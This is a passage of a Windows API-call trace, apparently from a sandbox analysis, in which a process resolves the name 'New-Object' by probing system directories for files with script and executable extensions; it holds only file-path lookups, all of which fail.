	[0046.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.JS", lpFilePart=0x0) returned 0x21
	[0046.525] GetFullPathNameW (in: lpFileName="New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JS", lpFilePart=0x0) returned 0x27
	[0046.525] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.JS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.JSE", lpFilePart=0x0) returned 0x22
	[0046.526] GetFullPathNameW (in: lpFileName="New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JSE", lpFilePart=0x0) returned 0x28
	[0046.526] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.JSE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.527] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.WSF", lpFilePart=0x0) returned 0x22
	[0046.527] GetFullPathNameW (in: lpFileName="New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSF", lpFilePart=0x0) returned 0x28
	[0046.527] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.WSF", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.527] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.WSH", lpFilePart=0x0) returned 0x22
	[0046.528] GetFullPathNameW (in: lpFileName="New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSH", lpFilePart=0x0) returned 0x28
	[0046.528] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.WSH", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.MSC", lpFilePart=0x0) returned 0x22
	[0046.528] GetFullPathNameW (in: lpFileName="New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.MSC", lpFilePart=0x0) returned 0x28
	[0046.528] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.MSC", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object.CPL", lpFilePart=0x0) returned 0x22
	[0046.529] GetFullPathNameW (in: lpFileName="New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CPL", lpFilePart=0x0) returned 0x28
	[0046.529] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.CPL", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0046.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0046.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\New-Object", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\New-Object", lpFilePart=0x0) returned 0x1e
	[0046.530] GetFullPathNameW (in: lpFileName="New-Object", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object", lpFilePart=0x0) returned 0x24
	[0046.530] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.530] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.530] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.530] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.ps1", lpFilePart=0x0) returned 0x19
	[0046.530] GetFullPathNameW (in: lpFileName="New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.ps1", lpFilePart=0x0) returned 0x28
	[0046.530] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.ps1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.531] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.531] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.531] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.psm1", lpFilePart=0x0) returned 0x1a
	[0046.531] GetFullPathNameW (in: lpFileName="New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psm1", lpFilePart=0x0) returned 0x29
	[0046.531] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.psm1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.532] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.532] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.532] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.psd1", lpFilePart=0x0) returned 0x1a
	[0046.532] GetFullPathNameW (in: lpFileName="New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psd1", lpFilePart=0x0) returned 0x29
	[0046.532] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.psd1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.532] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.532] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.533] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.COM", lpFilePart=0x0) returned 0x19
	[0046.533] GetFullPathNameW (in: lpFileName="New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.COM", lpFilePart=0x0) returned 0x28
	[0046.533] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.COM", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.533] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.533] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.533] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.EXE", lpFilePart=0x0) returned 0x19
	[0046.533] GetFullPathNameW (in: lpFileName="New-Object.EXE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.EXE", lpFilePart=0x0) returned 0x28
	[0046.533] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.EXE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.534] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.534] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.534] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.BAT", lpFilePart=0x0) returned 0x19
	[0046.534] GetFullPathNameW (in: lpFileName="New-Object.BAT", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.BAT", lpFilePart=0x0) returned 0x28
	[0046.534] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.BAT", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.534] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.534] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.535] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.CMD", lpFilePart=0x0) returned 0x19
